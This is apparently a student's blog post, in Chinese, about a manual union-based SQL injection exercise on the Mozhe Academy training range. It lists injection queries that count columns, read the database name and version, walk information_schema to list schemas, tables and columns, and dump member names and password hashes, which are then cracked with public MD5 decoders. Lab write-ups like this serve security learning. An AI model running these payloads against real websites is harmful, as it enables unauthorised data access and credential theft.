本周主要的学习内容是 sql注入
因为环境的问题,在本机搭建效果不好,索性找了一个靶场。
墨者学院
https://www.mozhe.cn/bug/detail/82
练手肯定够了,只支持 纯手工注入,sqlmap会失效。
注意!!!系统提示我外链掉了图,图片可能不完整和不连贯!!!
select * from news where id=1 order by 4
先是1=1 1=2 order等等方式判断字段数
select * from news where id=1 and 1=2 union select 1,2,3,4
通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段,原本的查询应该是select id,title,contents,times from news where id=1,也就是说title标题是第2个位置显示,contents内容是在第三个位置显示。
select * from news where id=1 and 1=2 union select 1,database(),version(),4
SQL语句中database()是查询当前数据库的名称(语法:select database();),一个服务器上可能有多个数据库,version()是查询当前数据的版本(语法:select version();),这里是这2个内容分别显示在第2、3的位置上,mozhe_Discuz_StormGroup为数据库,5.7.22-0ubuntu0.16.04.1为数据库版本和操作系统的版本。
这里涉及到数据库information_schema、表SCHEMATA、列SCHEMA_NAME三个内容,数据库information_schema是MySQL系统自带的数据库,其中记录了当前数据库系统中大部分我们需要了结的信息,比如字符集,权限相关,数据库实体对象信息,外检约束,分区,压缩表,表信息,索引信息,参数,优化,锁和事物等等。说白了,就是这个默认自带的数据中,存储了MySQL的数据库名字、表名字、列名字和其他信息,通过information_schema我们可以查看整个MySQL实例的情况。
在原来的标题上位置显示为mozhe_Discuz_StormGroup,内容的位置显示为3
在原来的标题上位置显示为performance_schema,内容的位置显示为3
分析解说:limit 3,1意思是从第3行起,取1行数据,performance_schema为获取的第4个数据库名称
limit 5,1意思是从第5行起,取1行数据,返回为空,说明只有5个数据库information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。
select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ and TABLE_NAME=‘StormGroup_member’ limit 4,1
继续深挖
最终得到
mozhe_Discuz_StormGroup中的表StormGroup_member只有4个字段,名称为:id,name,password,status。
select * from news where id=1 and 1=2 union select 1,CONCAT(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
select * from news where id=1 and 1=2 union select 1,CONCAT(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1
得到用户信息,密码等部分
最后再使用网络上公开的解码器,可以很容易的解码md5的密码 得到最终结果。
笔记如下;
大概就是这么多吧,开学了,这个学期课真多,还要准备英语46 难过。。。
552
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
